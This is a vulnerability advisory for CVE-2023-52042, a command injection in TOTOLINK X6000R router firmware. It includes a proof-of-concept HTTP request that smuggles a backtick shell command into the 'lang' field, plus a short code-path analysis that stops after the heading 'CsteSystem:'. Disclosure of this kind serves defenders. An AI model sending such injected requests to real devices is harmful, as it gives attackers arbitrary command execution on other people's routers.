CVE-2023-52042

Product:

TOTOLINK X6000R

Version：

V9.4.0cu.852_B20230719

Firmware download address ：

https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/247/ids/36.html

Vulnerability Description：

In the sub_410118 function of the shttpd program, it is possible to obtain the passed values using Uci_Set_Str and then achieve arbitrary command execution through CsteSystem.

POC

Execute the commands ls > /1.txt

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.75.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Origin: http://192.168.75.2
Connection: close
Referer: http://192.168.75.2/advance/ddns.html
{"lang":" `ls > /1.txt`","langAutoFlag":"0","topicurl":"setLanguageCfg"}

effect

Analysis

In the shttpd function, it is possible to exploit a command execution vulnerability by using the sub_4117F8 function to modify the ‘lang’ value when changing the language.

In Uci_Set_Str, the parameters are concatenated using snprintf and then passed into CsteSystem for execution.

CsteSystem: